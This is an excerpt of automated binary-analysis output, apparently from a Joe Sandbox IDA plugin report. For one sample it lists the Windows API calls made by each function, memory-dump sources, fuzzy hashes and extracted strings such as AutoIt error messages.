                                                                        • Opcode Fuzzy Hash: 51e0e0c6f584655693fdf10be31df02e1d6cb73bfec073738fd08ac489a9ec03
                                                                        • Instruction Fuzzy Hash: 2A518F3071424CBEEF209B288C85FEA7BA9FB05360F704615F925E61E1DB75A9C0EB51
                                                                        APIs
                                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 008CC2F7
                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 008CC319
                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 008CC331
                                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 008CC34F
                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 008CC370
                                                                        • DestroyIcon.USER32(00000000), ref: 008CC37F
                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 008CC39C
                                                                        • DestroyIcon.USER32(?), ref: 008CC3AB
                                                                          • Part of subcall function 0091A4AF: DeleteObject.GDI32(00000000), ref: 0091A4E8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                        • String ID:
                                                                        • API String ID: 2819616528-0
                                                                        • Opcode ID: 43c3d10df7839a3e679a583f5d861ae7f80024866fb1b89d490a16d0e9c4e80b
                                                                        • Instruction ID: 7d044fb988f2607fc83b926140939cf37b424981799bed42a6c56689c0fedeba
                                                                        • Opcode Fuzzy Hash: 43c3d10df7839a3e679a583f5d861ae7f80024866fb1b89d490a16d0e9c4e80b
                                                                        • Instruction Fuzzy Hash: 02512570610209AFDB20EF65DC55FAA7BB5FB58324F144528F906D72A0D770E990EB50
                                                                        APIs
                                                                          • Part of subcall function 008EA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 008EA84C
                                                                          • Part of subcall function 008EA82C: GetCurrentThreadId.KERNEL32 ref: 008EA853
                                                                          • Part of subcall function 008EA82C: AttachThreadInput.USER32(00000000,?,008E95BA,?,00000001), ref: 008EA85A
                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 008E968E
                                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 008E96AB
                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 008E96AE
                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 008E96B7
                                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 008E96D5
                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 008E96D8
                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 008E96E1
                                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 008E96F8
                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 008E96FB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                        • String ID:
                                                                        • API String ID: 2014098862-0
                                                                        • Opcode ID: 66825e8eea98f3f7eb6a181f9859f9d56327c7dc336ae192eb37666fb03c0dfa
                                                                        • Instruction ID: d8a69c40374f5a398fc4fd6457e94fdd0b3b1dd649cfc835061daeaf5c001d77
                                                                        • Opcode Fuzzy Hash: 66825e8eea98f3f7eb6a181f9859f9d56327c7dc336ae192eb37666fb03c0dfa
                                                                        • Instruction Fuzzy Hash: F711E571A2461CBEF7106F65DC49FAA3F1DEB4D795F104425F244AB0A0C9F25C10EAA4
                                                                        APIs
                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,008E853C,00000B00,?,?), ref: 008E892A
                                                                        • HeapAlloc.KERNEL32(00000000,?,008E853C,00000B00,?,?), ref: 008E8931
                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,008E853C,00000B00,?,?), ref: 008E8946
                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,008E853C,00000B00,?,?), ref: 008E894E
                                                                        • DuplicateHandle.KERNEL32(00000000,?,008E853C,00000B00,?,?), ref: 008E8951
                                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,008E853C,00000B00,?,?), ref: 008E8961
                                                                        • GetCurrentProcess.KERNEL32(008E853C,00000000,?,008E853C,00000B00,?,?), ref: 008E8969
                                                                        • DuplicateHandle.KERNEL32(00000000,?,008E853C,00000B00,?,?), ref: 008E896C
                                                                        • CreateThread.KERNEL32(00000000,00000000,008E8992,00000000,00000000,00000000), ref: 008E8986
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                        • String ID:
                                                                        • API String ID: 1957940570-0
                                                                        • Opcode ID: dbefe2cfe610e886dd99935a02cb428ab2ad0cabb1f0e193e587eba21cdb545b
                                                                        • Instruction ID: c21fa9382eb0ada00562b8e312bb5585438de091693300df036637288b7c374f
                                                                        • Opcode Fuzzy Hash: dbefe2cfe610e886dd99935a02cb428ab2ad0cabb1f0e193e587eba21cdb545b
                                                                        • Instruction Fuzzy Hash: E601BFB5754348FFE710ABA5DC4DFAB3B6CEB89711F408421FA05DB191CA749800DB20
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                        • API String ID: 0-572801152
                                                                        • Opcode ID: c4e488417b9cfa2e63eb5dca94b33da57c90e75e2846cb2542d296a7fa1da816
                                                                        • Instruction ID: 639d0b771e91e6bbdab158a452c85091d79093d53d30837d18c4a79481d408e9
                                                                        • Opcode Fuzzy Hash: c4e488417b9cfa2e63eb5dca94b33da57c90e75e2846cb2542d296a7fa1da816
                                                                        • Instruction Fuzzy Hash: 2AC19271A0021A9FDF10DF58D884BAEB7F9FB48314F148469E949E72C2E7709D45CB90
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearInit$_memset
                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                        • API String ID: 2862541840-625585964
                                                                        • Opcode ID: d5345f178083b8076e8dedffff096c283ffee850751a853a86b487e862a1e466
                                                                        • Instruction ID: b7b3e4fefcdacaeec537ff8c7c9a6b5475d54378d9f75ea0a5a550b3f3327844
                                                                        • Opcode Fuzzy Hash: d5345f178083b8076e8dedffff096c283ffee850751a853a86b487e862a1e466
                                                                        • Instruction Fuzzy Hash: 5D917871A00219AFDF24DFA9C848EAFBBB8EF85714F108559F515AB2D2D7709900CFA0
                                                                        APIs
                                                                          • Part of subcall function 008E710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008E7044,80070057,?,?,?,008E7455), ref: 008E7127
                                                                          • Part of subcall function 008E710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008E7044,80070057,?,?), ref: 008E7142
                                                                          • Part of subcall function 008E710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008E7044,80070057,?,?), ref: 008E7150
                                                                          • Part of subcall function 008E710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008E7044,80070057,?), ref: 008E7160
                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00909806
                                                                        • _memset.LIBCMT ref: 00909813
                                                                        • _memset.LIBCMT ref: 00909956
                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00909982
                                                                        • CoTaskMemFree.OLE32(?), ref: 0090998D
                                                                        Strings
                                                                        • NULL Pointer assignment, xrefs: 009099DB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                        • String ID: NULL Pointer assignment
                                                                        • API String ID: 1300414916-2785691316
                                                                        • Opcode ID: 2b36832c643c5c21f2b9eb531bef7b341ea57269c74f2ec4a4e9a4834432725d
                                                                        • Instruction ID: 954e79601456fc2817db92581ef631dd28acea14907637ee6359b549e603cbcb
                                                                        • Opcode Fuzzy Hash: 2b36832c643c5c21f2b9eb531bef7b341ea57269c74f2ec4a4e9a4834432725d
                                                                        • Instruction Fuzzy Hash: BD912671900229EBDF10EFA5DC40EDEBBB9FF49310F104159F519A7281EB319A44CBA1
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00916E24
                                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 00916E38
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?,?,008CCC6D,?,?,?,?), ref: 00916E52
                                                                        • _wcscat.LIBCMT ref: 00916EAD
                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00916EC4
                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00916EF2
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: MessageSend$Window_wcscat
                                                                        • String ID: SysListView32
                                                                        • API String ID: 307300125-78025650
                                                                        • Opcode ID: 83f0f0c676882865dd79c4f5d882ee4e213f4a162987a5fce89b4b36de379377
                                                                        • Instruction ID: a761b84278900141235d444bc97ce184eda10a4d546acfe2dd519bcc17acc24c
                                                                        • Opcode Fuzzy Hash: 83f0f0c676882865dd79c4f5d882ee4e213f4a162987a5fce89b4b36de379377
                                                                        • Instruction Fuzzy Hash: C541AD74A0030CABEB21DF64CC85BEA77E8EF08354F10452AF985E7292D6729D84CB60
                                                                        APIs
                                                                          • Part of subcall function 008F3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 008F3C7A
                                                                          • Part of subcall function 008F3C55: Process32FirstW.KERNEL32(00000000,?), ref: 008F3C88
                                                                          • Part of subcall function 008F3C55: CloseHandle.KERNEL32(00000000), ref: 008F3D52
                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0090E9A4
                                                                        • GetLastError.KERNEL32 ref: 0090E9B7
                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0090E9E6
                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0090EA63
                                                                        • GetLastError.KERNEL32(00000000), ref: 0090EA6E
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0090EAA3
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                        • String ID: SeDebugPrivilege
                                                                        • API String ID: 2533919879-2896544425
                                                                        • Opcode ID: c80b91bb31542de36b1c0091fe76e898f1accf5c1efa99f7f51521b6e7e4c3e5
                                                                        • Instruction ID: 93ff7c26290b25d465ac426ca5959882e32d1dd80081f5bad9c7d68b5ae86caa
                                                                        • Opcode Fuzzy Hash: c80b91bb31542de36b1c0091fe76e898f1accf5c1efa99f7f51521b6e7e4c3e5
                                                                        • Instruction Fuzzy Hash: 2B4176313042049FDB15EF28CCA5BAEB7A5FF45314F18882CF9469B2D2DB74A804CB92
                                                                        APIs
                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 008F3033
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: IconLoad
                                                                        • String ID: blank$info$question$stop$warning
                                                                        • API String ID: 2457776203-404129466
                                                                        • Opcode ID: 6ee268a1018e4fb30d76f4a022b64ee776d9bd37ad314738609615e84709956a
                                                                        • Instruction ID: b7efdfd33970b4a683caf40b1a183b26e0952ebb64e32b353f9b48d950bdf4d4
                                                                        • Opcode Fuzzy Hash: 6ee268a1018e4fb30d76f4a022b64ee776d9bd37ad314738609615e84709956a
                                                                        • Instruction Fuzzy Hash: 8C11D831348B8EBEE7159A69DC42CBF779CFF55364B20006BFB00E6282DE619F4055A5
                                                                        APIs
                                                                        • GetProcessHeap.KERNEL32(00000008,00001000,?,?,?,?,?,0091FB24,00000001,00000000,?,?,008C8249,0091FB24,0000000C,00000080), ref: 008C980B
                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0091FB24,00000001,00000000,?,?,008C8249,0091FB24,0000000C,00000080), ref: 008C9812
                                                                          • Part of subcall function 008B8B28: __getptd_noexit.LIBCMT ref: 008B8B28
                                                                        • __lseeki64_nolock.LIBCMT ref: 008C98D6
                                                                        • SetEndOfFile.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0091FB24,00000001,00000000,?,?,008C8249), ref: 008C98F1
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0091FB24,00000001,00000000,?,?,008C8249,0091FB24), ref: 008C9921
                                                                        • __lseeki64_nolock.LIBCMT ref: 008C993E
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: Heap__lseeki64_nolock$AllocErrorFileLastProcess__getptd_noexit
                                                                        • String ID: shj
                                                                        • API String ID: 2369599718-2847237874
                                                                        • Opcode ID: fae0bd7f9a0e020e20e5db0e618f693b28a94d44a817b508b6438e7ddcd9ad8c
                                                                        • Instruction ID: fcf4b87371cd3643d442384dd02ab051bf554531eea092d56c56b67e48929ccb
                                                                        • Opcode Fuzzy Hash: fae0bd7f9a0e020e20e5db0e618f693b28a94d44a817b508b6438e7ddcd9ad8c
                                                                        • Instruction Fuzzy Hash: 0511B471644605AACB102FB89C4EBAC3774FF0B321F1447B8F569D62E0E638C4018652
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 008F4312
                                                                        • LoadStringW.USER32(00000000), ref: 008F4319
                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 008F432F
                                                                        • LoadStringW.USER32(00000000), ref: 008F4336
                                                                        • _wprintf.LIBCMT ref: 008F435C
                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 008F437A
                                                                        Strings
                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 008F4357
                                                                        Similarity
                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                        • API String ID: 3648134473-3128320259
                                                                        • Opcode ID: 3d8f3701dcc4af03feffc20ced76368277e19cdd762bd4a9ba7d6e32fd5f7787
                                                                        • Instruction ID: 2873cac0eae2c5fc39239eb8f97aebf99b1e1ddf077f8649df16484f3784760d
                                                                        • Opcode Fuzzy Hash: 3d8f3701dcc4af03feffc20ced76368277e19cdd762bd4a9ba7d6e32fd5f7787
                                                                        • Instruction Fuzzy Hash: E6012CF6A0420CBFE711A7A49D89EEB766CEB08300F4045A2BB49E2151EA745E859B71
                                                                        APIs
                                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,008CC1C7,00000004,00000000,00000000,00000000), ref: 00892ACF
                                                                        • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,008CC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00892B17
                                                                        • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,008CC1C7,00000004,00000000,00000000,00000000), ref: 008CC21A
                                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,008CC1C7,00000004,00000000,00000000,00000000), ref: 008CC286
                                                                        Similarity
                                                                        • API ID: ShowWindow
                                                                        • String ID:
                                                                        • API String ID: 1268545403-0
                                                                        • Opcode ID: 4bbc64ed71ecb743e49632330e9e8c2aa9a84f78dac3b16de2bf482d2cc40ac8
                                                                        • Instruction ID: e19b418d9b22ff2311d159354e090e915d50a877ff9344f8fda376ba05073d07
                                                                        • Opcode Fuzzy Hash: 4bbc64ed71ecb743e49632330e9e8c2aa9a84f78dac3b16de2bf482d2cc40ac8
                                                                        • Instruction Fuzzy Hash: C041F832618798BACF35AB299C9CB6E7BE2FB45324F1C881DE04BC6561C671E841E711
                                                                        APIs
                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 008F70DD
                                                                          • Part of subcall function 008B0DB6: std::exception::exception.LIBCMT ref: 008B0DEC
                                                                          • Part of subcall function 008B0DB6: __CxxThrowException@8.LIBCMT ref: 008B0E01
                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 008F7114
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 008F7130
                                                                        • _memmove.LIBCMT ref: 008F717E
                                                                        • _memmove.LIBCMT ref: 008F719B
                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 008F71AA
                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 008F71BF
                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 008F71DE
                                                                        Similarity
                                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 256516436-0
                                                                        • Opcode ID: ec8c32582eef94ee513b3a974b2bbc20046c2ae5aa170b91ba19bb1a8c96accb
                                                                        • Instruction ID: 3738e64a6e015579927be7e04823bda4a901c79e94cdbfe3ab6fddd7c01a9f33
                                                                        • Opcode Fuzzy Hash: ec8c32582eef94ee513b3a974b2bbc20046c2ae5aa170b91ba19bb1a8c96accb
                                                                        • Instruction Fuzzy Hash: F2316D31A04209EBDB00DFA8DC85AAFB7B8FF45310F1481B5E904EB256DB30DA54DBA1
                                                                        APIs
                                                                        • DeleteObject.GDI32(00000000), ref: 009161EB
                                                                        • GetDC.USER32(00000000), ref: 009161F3
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009161FE
                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0091620A
                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00916246
                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00916257
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00916291
                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 009162B1
                                                                        Similarity
                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                        • String ID:
                                                                        • API String ID: 3864802216-0
                                                                        • Opcode ID: 982ca4cc74dd4c58734badb825b9ca302688fcff81c60abb7b8c1e9f314e7033
                                                                        • Instruction ID: 99195fe74784293fc6a07dcc87929438a11adcef7b539618c754e132faab0c1d
                                                                        • Opcode Fuzzy Hash: 982ca4cc74dd4c58734badb825b9ca302688fcff81c60abb7b8c1e9f314e7033
                                                                        • Instruction Fuzzy Hash: 7E319C72214218BFEF118F10CC8AFEA3BADEF4A765F044065FE08DA291C6759C41CB60
                                                                        APIs
                                                                        Similarity
                                                                        • API ID: _memcmp
                                                                        • String ID:
                                                                        • API String ID: 2931989736-0
                                                                        • Opcode ID: 409671b803bb62151fb5a9203db2c0d418b2c34d5da17e301410130438e6bd43
                                                                        • Instruction ID: 89e7dc73d110632f7d14f5e577823dcd318cb437182abd9cf880a27e833aa1aa
                                                                        • Opcode Fuzzy Hash: 409671b803bb62151fb5a9203db2c0d418b2c34d5da17e301410130438e6bd43
                                                                        • Instruction Fuzzy Hash: 3C2123716052997BEA04A716AD52FFB735EFF9235CF184420FD04DA24BEB24DE10C2A6
                                                                        APIs
                                                                          • Part of subcall function 00899837: __itow.LIBCMT ref: 00899862
                                                                          • Part of subcall function 008AFC86: _wcscpy.LIBCMT ref: 008AFCA9
                                                                        • _wcstok.LIBCMT ref: 008FEC94
                                                                        • _wcscpy.LIBCMT ref: 008FED23
                                                                        • _memset.LIBCMT ref: 008FED56
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscpy$__itow_memset_wcstok
                                                                        • String ID: X
                                                                        • API String ID: 1564591943-3081909835
                                                                        • Opcode ID: fcce1c1f58eb9498143ae1aa0c4a932cb6dd053fbc71fe5c5f6ac90f48f34f27
                                                                        • Instruction ID: 6221bdbc59e924640bc75cdfc47e003bec3f76a339c6c43dd0f465ab26c30433
                                                                        • Opcode Fuzzy Hash: fcce1c1f58eb9498143ae1aa0c4a932cb6dd053fbc71fe5c5f6ac90f48f34f27
                                                                        • Instruction Fuzzy Hash: F9C13B716083449FCB64EF28D841A6AB7E4FF85314F14492DF99ADB2A2DB30E845CB53
                                                                        APIs
                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00906C00
                                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00906C21
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00906C34
                                                                        • htons.WSOCK32(?,?,?,00000000,?), ref: 00906CEA
                                                                        • inet_ntoa.WSOCK32(?), ref: 00906CA7
                                                                          • Part of subcall function 008EA7E9: _strlen.LIBCMT ref: 008EA7F3
                                                                          • Part of subcall function 008EA7E9: _memmove.LIBCMT ref: 008EA815
                                                                        • _strlen.LIBCMT ref: 00906D44
                                                                        • _memmove.LIBCMT ref: 00906DAD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                        • String ID:
                                                                        • API String ID: 3619996494-0
                                                                        • Opcode ID: c19908d22db0f4fc7c427c543c3f9026d068e5f3cbed6e436fe379878a70a9a4
                                                                        • Instruction ID: d995da95b1f288f2638de3a724df2e87858dfc0ceaafed08a6c90c7875a1250c
                                                                        • Opcode Fuzzy Hash: c19908d22db0f4fc7c427c543c3f9026d068e5f3cbed6e436fe379878a70a9a4
                                                                        • Instruction Fuzzy Hash: 5881AE71208200AFDB10EB28CC92E6AB7E8EF95724F14491DF556DB2D2DB70AD01CB92
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c4432a82ee319daae911af9f2dcfe443dfb6b9a3952b80e35ea31d8b6851bd13
                                                                        • Instruction ID: 6a9ce5aa6e72970388d132d0abbcfbbb62bdaa198586b81009313084f3400805
                                                                        • Opcode Fuzzy Hash: c4432a82ee319daae911af9f2dcfe443dfb6b9a3952b80e35ea31d8b6851bd13
                                                                        • Instruction Fuzzy Hash: 72715B30A0850AEFCF04EF98CC49EBEBB79FF89314F148159E915EA251C734AA51CB64
                                                                        APIs
                                                                        • IsWindow.USER32(014C4A20), ref: 0091B3EB
                                                                        • IsWindowEnabled.USER32(014C4A20), ref: 0091B3F7
                                                                        • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0091B4DB
                                                                        • SendMessageW.USER32(014C4A20,000000B0,?,?), ref: 0091B512
                                                                        • IsDlgButtonChecked.USER32(?,?), ref: 0091B54F
